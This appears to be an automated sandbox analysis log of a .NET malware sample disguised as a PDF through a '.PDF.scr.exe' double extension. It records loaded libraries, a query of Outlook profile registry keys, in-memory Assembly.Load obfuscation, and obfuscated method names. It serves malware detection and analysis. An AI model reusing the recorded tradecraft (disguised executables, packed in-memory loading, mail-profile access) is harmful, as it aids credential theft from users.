                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: pre-stowage.PDF.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: pre-stowage.PDF.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: pre-stowage.PDF.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: DjCW.pdb source: pre-stowage.PDF.scr.exe
                Source: Binary string: DjCW.pdbSHA256 source: pre-stowage.PDF.scr.exe

                Data Obfuscation

Source: pre-stowage.PDF.scr.exe, Form11.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.pre-stowage.PDF.scr.exe.4074468.2.raw.unpack, MainForm.cs | .Net Code: _202B_200C_200F_200D_200D_202A_206D_202C_200B_200E_202B_206E_206B_206B_206E_200B_200F_206E_200E_202E_200F_202A_200D_200B_206C_206B_200F_200B_200C_206A_206A_200F_202E_200C_206E_200F_206C_206D_202D_202B_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, os6c027q4yBtMN9Rka.cs | .Net Code: UBYctR4QVZ System.Reflection.Assembly.Load(byte[])
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, os6c027q4yBtMN9Rka.cs | .Net Code: UBYctR4QVZ System.Reflection.Assembly.Load(byte[])
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, os6c027q4yBtMN9Rka.cs | .Net Code: UBYctR4QVZ System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795DDE0 push eax; retf 0_2_0795DDE1
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795D5EA push esi; ret 0_2_0795D5ED
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EF9C30 push esp; retf 010Fh 4_2_00EF9D55
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EF891E pushad ; iretd 4_2_00EF891F
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EF8C2F pushfd ; iretd 4_2_00EF8C30
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EF8DDF push esp; iretd 4_2_00EF8DE0
Source: pre-stowage.PDF.scr.exe | Static PE information: section name: .text entropy: 7.655601029073059
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, jeEVGMbwFxUtIgFgKM.cs | High entropy of concatenated method names: 'HNNtglYej', 'K2GxRhRnt', 'XKqTNcZ5y', 'UYIjRVTeT', 'h3Yec80wk', 'RMD3NQhFa', 'fQmZRSIMAurtD5qnU5', 'tfQnoiiuNTFkjlkhpe', 'vxb6SiXPu', 'T4HymkN41'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, UJx16k4wibYGBEee69.cs | High entropy of concatenated method names: 'v8a28Oai4t', 'AOY2pxsWcU', 'OGM2WMbJmR', 'P5s2syPyYk', 'Tpv2CMeAwu', 'sbG2qKkeb2', 'Cte4LnEgIZ4qHgAfBs', 'ckTCDgMPDlTXFC8byj', 'DxL22XHZTy', 'XhR2g953n3'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, n3YbDmHT2jVUifwuLy.cs | High entropy of concatenated method names: 'orBuMl5daL', 'XPNuS9BSB0', 'rLC6YMxURk', 'mou62PcfxV', 'uWYuHgbejA', 'smFuX1BbQS', 'jXKuILWL8x', 'S2uuLNZHf1', 'YNjuAVcfO5', 'CxjuixpLDb'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, opJUIm9UcyxBl5Yai1.cs | High entropy of concatenated method names: 'n6vCPdrNtE', 'UBSCXwOUGH', 'iHjCLRVrQB', 'JsxCAjPIOM', 'AZpCmPqph3', 'wlMCdwI850', 'xSGCQgPDLC', 'ijLCwusquh', 'N3hCnZRZvC', 't1MCV2bdaU'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, JAiuoQWeZCVY5sQiOM.cs | High entropy of concatenated method names: 'V7BFCy1q7s', 'o00FuyFfWH', 'tC9FFvqbdu', 'K2TF9STASS', 'EpiFautIJ4', 'qEwF7QlfYT', 'Dispose', 'iEK6Ky8AWs', 'M2v607gTWu', 'OTx6fRqZd2'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, ypTk0VpAB3YFXV3wNl.cs | High entropy of concatenated method names: 'dDnMKq2F9c12JC8T0H4', 'OQuqW42TlDgr76I1w7W', 'h6oN6fYZUW', 'mYkNFseUwu', 'r62NyZLBF6', 'WKIvPG2cDhj5qqA333o', 'af5nwZ2neOXIpAGKOxu'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, PmXsTUCDOgkMU8yksJ.cs | High entropy of concatenated method names: 'dOxNoUgvBn', 'NhoN0KXtpJ', 'P03NbBBUb9', 'PDQN8yuuDh', 'sPpNpYRaKe', 'hcBbEgIxYJ', 'wHCbvkBtN8', 'CrxbOnqYLq', 'v9kbMI1xaT', 'a6Zb5dekui'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, BEMj65tVslqGPIwBnf.cs | High entropy of concatenated method names: 'Dispose', 'F6Q25yDtoD', 'r0SJm3XaHn', 'KWhREHlU2U', 'ldb2SMIMlS', 'R4O2zHiWl8', 'ProcessDialogKey', 's9kJYc6R5Z', 'wwGJ2ftsj1', 'r5kJJ91WZW'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, UfFTqgYtsb6KTX3coT.cs | High entropy of concatenated method names: 'cIp0L354ZI', 'X0D0ASEdAj', 'TH80iqroyB', 'lqu0Ux5S3H', 'P4h0EWBnad', 'LIf0vAHAL7', 'BuD0OiDtrr', 'PlW0MAaWDr', 'wvY05xdchd', 'krm0SPEGZt'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, xb8rqfNfAIUnuW0mCg.cs | High entropy of concatenated method names: 'OyylrpNiaG', 'fEjleZi9Z0', 'lVNlGq0bSK', 'SJalmZXufJ', 'auJlQc4eU8', 'v56lwHjmE2', 'nIFlVyAI4C', 'b31l4bpA6A', 'uU8lP8tHU4', 'EZflHMVCSG'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, os6c027q4yBtMN9Rka.cs | High entropy of concatenated method names: 'RCxgoRSXgy', 'NolgKc0dv3', 'Xkbg0jT5v8', 'vKUgfCnZX3', 'Ws8gbFUryx', 'TNWgNhRrPc', 'm0Vg8WGcQy', 'RBcgpsnTqK', 'gP7gZ8gdWp', 'S97gWfOefD'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, QDGTI6wugRXuhhDQD6D.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'POIyHhlZBW', 'TOuyXsyanY', 'ef0yIsgTtY', 'GfYyLFr1pH', 'fq2yAjpntc', 'llAyi8ed0c', 'iLfyUqqjxg'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, bCZYANwwpQ2r7u6mgpB.cs | High entropy of concatenated method names: 'dPQyS7xXOo', 'GHpyzoMBeG', 'nW49YncIbO', 't0192jUNTQ', 'ObR9JTpSuh', 'RaG9gqrAKJ', 'a7N9cb6dyo', 'apc9oNokWF', 'QGu9KAyfxq', 'BlB90AXKti'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, VLsxuBhnuaR0lNrC6k.cs | High entropy of concatenated method names: 'ToString', 'j0pqH3VvGt', 'Y77qmGH1Po', 'W3rqdefa8O', 'eR8qQux2Nx', 'VshqwTtWa6', 'xi3qndt99E', 'jWhqVuZssA', 'HYcq4XbgbQ', 'pVqqkE2QoX'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, lOJAEsscuiBpdmc6iC.cs | High entropy of concatenated method names: 'cxZyfCU65h', 'fMBybCJRPT', 'DGqyN6tEMC', 'ejry8nvcfv', 'oFJyFHwfnG', 'ebOypnqSjC', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, OFjZs8w4IE7cY9fQFJk.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oUrRFVk2t3', 'Ql8Ryw8GDW', 'x09R96nPrI', 'TqQRRieYgJ', 'YyeRaVNGGv', 'AFmRBQEwxP', 'lGYR7VMq7U'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, r5YwhfVYKOBjaNYsWF.cs | High entropy of concatenated method names: 'qv981D533I', 'JeD8hhyDE4', 'z1m8to2tNV', 'yJK8xQZoNl', 'O8j8DseaSN', 'ebh8ThcGCw', 'mYd8jVLGwI', 'UYh8rvD79K', 'DZq8eacTBB', 'VAR83DZ6d5'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, BW1XoG8aG2SQRRV2vI.cs | High entropy of concatenated method names: 'cAKuWXbHWE', 'nUgusq84th', 'ToString', 'faBuKkpvEW', 'B5Fu0yShrc', 'iJxufQFwED', 'F6WubTc3FB', 'aIQuNF2I8s', 'b89u8C3h2r', 'aLpupNVbwJ'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, KpCbpn3nRoLFMRTXIK.cs | High entropy of concatenated method names: 'ip6fx90Bqf', 'lkJfT3X34j', 'MrgfrY3Vyd', 'pqcferWTH1', 'BVtfCkpuPr', 'N68fqlCKjE', 'crefu3lnwi', 'MOCf6bKJ9Q', 'UGAfF4rZjC', 'EPkfy0DSVJ'
Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, As70r9koVQtCbi77sS.cs | High entropy of concatenated method names: 'imQFGVRHLd', 'S8UFmotGXR', 'JoQFdQgK4D', 'meLFQZuDf6', 'oATFwUG2Ks', 'XSuFnu9alB', 'UhjFV1Zqhn', 'OcwF4rSMEc', 'c9tFkng1wr', 'vkPFPMVtHG'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, jeEVGMbwFxUtIgFgKM.cs | High entropy of concatenated method names: 'HNNtglYej', 'K2GxRhRnt', 'XKqTNcZ5y', 'UYIjRVTeT', 'h3Yec80wk', 'RMD3NQhFa', 'fQmZRSIMAurtD5qnU5', 'tfQnoiiuNTFkjlkhpe', 'vxb6SiXPu', 'T4HymkN41'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, UJx16k4wibYGBEee69.cs | High entropy of concatenated method names: 'v8a28Oai4t', 'AOY2pxsWcU', 'OGM2WMbJmR', 'P5s2syPyYk', 'Tpv2CMeAwu', 'sbG2qKkeb2', 'Cte4LnEgIZ4qHgAfBs', 'ckTCDgMPDlTXFC8byj', 'DxL22XHZTy', 'XhR2g953n3'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, n3YbDmHT2jVUifwuLy.cs | High entropy of concatenated method names: 'orBuMl5daL', 'XPNuS9BSB0', 'rLC6YMxURk', 'mou62PcfxV', 'uWYuHgbejA', 'smFuX1BbQS', 'jXKuILWL8x', 'S2uuLNZHf1', 'YNjuAVcfO5', 'CxjuixpLDb'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, opJUIm9UcyxBl5Yai1.cs | High entropy of concatenated method names: 'n6vCPdrNtE', 'UBSCXwOUGH', 'iHjCLRVrQB', 'JsxCAjPIOM', 'AZpCmPqph3', 'wlMCdwI850', 'xSGCQgPDLC', 'ijLCwusquh', 'N3hCnZRZvC', 't1MCV2bdaU'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, JAiuoQWeZCVY5sQiOM.cs | High entropy of concatenated method names: 'V7BFCy1q7s', 'o00FuyFfWH', 'tC9FFvqbdu', 'K2TF9STASS', 'EpiFautIJ4', 'qEwF7QlfYT', 'Dispose', 'iEK6Ky8AWs', 'M2v607gTWu', 'OTx6fRqZd2'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, ypTk0VpAB3YFXV3wNl.cs | High entropy of concatenated method names: 'dDnMKq2F9c12JC8T0H4', 'OQuqW42TlDgr76I1w7W', 'h6oN6fYZUW', 'mYkNFseUwu', 'r62NyZLBF6', 'WKIvPG2cDhj5qqA333o', 'af5nwZ2neOXIpAGKOxu'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, PmXsTUCDOgkMU8yksJ.cs | High entropy of concatenated method names: 'dOxNoUgvBn', 'NhoN0KXtpJ', 'P03NbBBUb9', 'PDQN8yuuDh', 'sPpNpYRaKe', 'hcBbEgIxYJ', 'wHCbvkBtN8', 'CrxbOnqYLq', 'v9kbMI1xaT', 'a6Zb5dekui'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, BEMj65tVslqGPIwBnf.cs | High entropy of concatenated method names: 'Dispose', 'F6Q25yDtoD', 'r0SJm3XaHn', 'KWhREHlU2U', 'ldb2SMIMlS', 'R4O2zHiWl8', 'ProcessDialogKey', 's9kJYc6R5Z', 'wwGJ2ftsj1', 'r5kJJ91WZW'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, UfFTqgYtsb6KTX3coT.cs | High entropy of concatenated method names: 'cIp0L354ZI', 'X0D0ASEdAj', 'TH80iqroyB', 'lqu0Ux5S3H', 'P4h0EWBnad', 'LIf0vAHAL7', 'BuD0OiDtrr', 'PlW0MAaWDr', 'wvY05xdchd', 'krm0SPEGZt'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, xb8rqfNfAIUnuW0mCg.cs | High entropy of concatenated method names: 'OyylrpNiaG', 'fEjleZi9Z0', 'lVNlGq0bSK', 'SJalmZXufJ', 'auJlQc4eU8', 'v56lwHjmE2', 'nIFlVyAI4C', 'b31l4bpA6A', 'uU8lP8tHU4', 'EZflHMVCSG'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, os6c027q4yBtMN9Rka.cs | High entropy of concatenated method names: 'RCxgoRSXgy', 'NolgKc0dv3', 'Xkbg0jT5v8', 'vKUgfCnZX3', 'Ws8gbFUryx', 'TNWgNhRrPc', 'm0Vg8WGcQy', 'RBcgpsnTqK', 'gP7gZ8gdWp', 'S97gWfOefD'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, QDGTI6wugRXuhhDQD6D.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'POIyHhlZBW', 'TOuyXsyanY', 'ef0yIsgTtY', 'GfYyLFr1pH', 'fq2yAjpntc', 'llAyi8ed0c', 'iLfyUqqjxg'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, bCZYANwwpQ2r7u6mgpB.cs | High entropy of concatenated method names: 'dPQyS7xXOo', 'GHpyzoMBeG', 'nW49YncIbO', 't0192jUNTQ', 'ObR9JTpSuh', 'RaG9gqrAKJ', 'a7N9cb6dyo', 'apc9oNokWF', 'QGu9KAyfxq', 'BlB90AXKti'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, VLsxuBhnuaR0lNrC6k.cs | High entropy of concatenated method names: 'ToString', 'j0pqH3VvGt', 'Y77qmGH1Po', 'W3rqdefa8O', 'eR8qQux2Nx', 'VshqwTtWa6', 'xi3qndt99E', 'jWhqVuZssA', 'HYcq4XbgbQ', 'pVqqkE2QoX'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, lOJAEsscuiBpdmc6iC.cs | High entropy of concatenated method names: 'cxZyfCU65h', 'fMBybCJRPT', 'DGqyN6tEMC', 'ejry8nvcfv', 'oFJyFHwfnG', 'ebOypnqSjC', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, OFjZs8w4IE7cY9fQFJk.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oUrRFVk2t3', 'Ql8Ryw8GDW', 'x09R96nPrI', 'TqQRRieYgJ', 'YyeRaVNGGv', 'AFmRBQEwxP', 'lGYR7VMq7U'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, r5YwhfVYKOBjaNYsWF.cs | High entropy of concatenated method names: 'qv981D533I', 'JeD8hhyDE4', 'z1m8to2tNV', 'yJK8xQZoNl', 'O8j8DseaSN', 'ebh8ThcGCw', 'mYd8jVLGwI', 'UYh8rvD79K', 'DZq8eacTBB', 'VAR83DZ6d5'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, BW1XoG8aG2SQRRV2vI.cs | High entropy of concatenated method names: 'cAKuWXbHWE', 'nUgusq84th', 'ToString', 'faBuKkpvEW', 'B5Fu0yShrc', 'iJxufQFwED', 'F6WubTc3FB', 'aIQuNF2I8s', 'b89u8C3h2r', 'aLpupNVbwJ'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, KpCbpn3nRoLFMRTXIK.cs | High entropy of concatenated method names: 'ip6fx90Bqf', 'lkJfT3X34j', 'MrgfrY3Vyd', 'pqcferWTH1', 'BVtfCkpuPr', 'N68fqlCKjE', 'crefu3lnwi', 'MOCf6bKJ9Q', 'UGAfF4rZjC', 'EPkfy0DSVJ'
Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, As70r9koVQtCbi77sS.cs | High entropy of concatenated method names: 'imQFGVRHLd', 'S8UFmotGXR', 'JoQFdQgK4D', 'meLFQZuDf6', 'oATFwUG2Ks', 'XSuFnu9alB', 'UhjFV1Zqhn', 'OcwF4rSMEc', 'c9tFkng1wr', 'vkPFPMVtHG'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, jeEVGMbwFxUtIgFgKM.cs | High entropy of concatenated method names: 'HNNtglYej', 'K2GxRhRnt', 'XKqTNcZ5y', 'UYIjRVTeT', 'h3Yec80wk', 'RMD3NQhFa', 'fQmZRSIMAurtD5qnU5', 'tfQnoiiuNTFkjlkhpe', 'vxb6SiXPu', 'T4HymkN41'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, UJx16k4wibYGBEee69.cs | High entropy of concatenated method names: 'v8a28Oai4t', 'AOY2pxsWcU', 'OGM2WMbJmR', 'P5s2syPyYk', 'Tpv2CMeAwu', 'sbG2qKkeb2', 'Cte4LnEgIZ4qHgAfBs', 'ckTCDgMPDlTXFC8byj', 'DxL22XHZTy', 'XhR2g953n3'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, n3YbDmHT2jVUifwuLy.cs | High entropy of concatenated method names: 'orBuMl5daL', 'XPNuS9BSB0', 'rLC6YMxURk', 'mou62PcfxV', 'uWYuHgbejA', 'smFuX1BbQS', 'jXKuILWL8x', 'S2uuLNZHf1', 'YNjuAVcfO5', 'CxjuixpLDb'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, opJUIm9UcyxBl5Yai1.cs | High entropy of concatenated method names: 'n6vCPdrNtE', 'UBSCXwOUGH', 'iHjCLRVrQB', 'JsxCAjPIOM', 'AZpCmPqph3', 'wlMCdwI850', 'xSGCQgPDLC', 'ijLCwusquh', 'N3hCnZRZvC', 't1MCV2bdaU'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, JAiuoQWeZCVY5sQiOM.cs | High entropy of concatenated method names: 'V7BFCy1q7s', 'o00FuyFfWH', 'tC9FFvqbdu', 'K2TF9STASS', 'EpiFautIJ4', 'qEwF7QlfYT', 'Dispose', 'iEK6Ky8AWs', 'M2v607gTWu', 'OTx6fRqZd2'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, ypTk0VpAB3YFXV3wNl.cs | High entropy of concatenated method names: 'dDnMKq2F9c12JC8T0H4', 'OQuqW42TlDgr76I1w7W', 'h6oN6fYZUW', 'mYkNFseUwu', 'r62NyZLBF6', 'WKIvPG2cDhj5qqA333o', 'af5nwZ2neOXIpAGKOxu'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, PmXsTUCDOgkMU8yksJ.cs | High entropy of concatenated method names: 'dOxNoUgvBn', 'NhoN0KXtpJ', 'P03NbBBUb9', 'PDQN8yuuDh', 'sPpNpYRaKe', 'hcBbEgIxYJ', 'wHCbvkBtN8', 'CrxbOnqYLq', 'v9kbMI1xaT', 'a6Zb5dekui'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, BEMj65tVslqGPIwBnf.cs | High entropy of concatenated method names: 'Dispose', 'F6Q25yDtoD', 'r0SJm3XaHn', 'KWhREHlU2U', 'ldb2SMIMlS', 'R4O2zHiWl8', 'ProcessDialogKey', 's9kJYc6R5Z', 'wwGJ2ftsj1', 'r5kJJ91WZW'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, UfFTqgYtsb6KTX3coT.cs | High entropy of concatenated method names: 'cIp0L354ZI', 'X0D0ASEdAj', 'TH80iqroyB', 'lqu0Ux5S3H', 'P4h0EWBnad', 'LIf0vAHAL7', 'BuD0OiDtrr', 'PlW0MAaWDr', 'wvY05xdchd', 'krm0SPEGZt'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, xb8rqfNfAIUnuW0mCg.cs | High entropy of concatenated method names: 'OyylrpNiaG', 'fEjleZi9Z0', 'lVNlGq0bSK', 'SJalmZXufJ', 'auJlQc4eU8', 'v56lwHjmE2', 'nIFlVyAI4C', 'b31l4bpA6A', 'uU8lP8tHU4', 'EZflHMVCSG'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, os6c027q4yBtMN9Rka.cs | High entropy of concatenated method names: 'RCxgoRSXgy', 'NolgKc0dv3', 'Xkbg0jT5v8', 'vKUgfCnZX3', 'Ws8gbFUryx', 'TNWgNhRrPc', 'm0Vg8WGcQy', 'RBcgpsnTqK', 'gP7gZ8gdWp', 'S97gWfOefD'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, QDGTI6wugRXuhhDQD6D.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'POIyHhlZBW', 'TOuyXsyanY', 'ef0yIsgTtY', 'GfYyLFr1pH', 'fq2yAjpntc', 'llAyi8ed0c', 'iLfyUqqjxg'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, bCZYANwwpQ2r7u6mgpB.cs | High entropy of concatenated method names: 'dPQyS7xXOo', 'GHpyzoMBeG', 'nW49YncIbO', 't0192jUNTQ', 'ObR9JTpSuh', 'RaG9gqrAKJ', 'a7N9cb6dyo', 'apc9oNokWF', 'QGu9KAyfxq', 'BlB90AXKti'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, VLsxuBhnuaR0lNrC6k.cs | High entropy of concatenated method names: 'ToString', 'j0pqH3VvGt', 'Y77qmGH1Po', 'W3rqdefa8O', 'eR8qQux2Nx', 'VshqwTtWa6', 'xi3qndt99E', 'jWhqVuZssA', 'HYcq4XbgbQ', 'pVqqkE2QoX'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, lOJAEsscuiBpdmc6iC.cs | High entropy of concatenated method names: 'cxZyfCU65h', 'fMBybCJRPT', 'DGqyN6tEMC', 'ejry8nvcfv', 'oFJyFHwfnG', 'ebOypnqSjC', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, OFjZs8w4IE7cY9fQFJk.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oUrRFVk2t3', 'Ql8Ryw8GDW', 'x09R96nPrI', 'TqQRRieYgJ', 'YyeRaVNGGv', 'AFmRBQEwxP', 'lGYR7VMq7U'
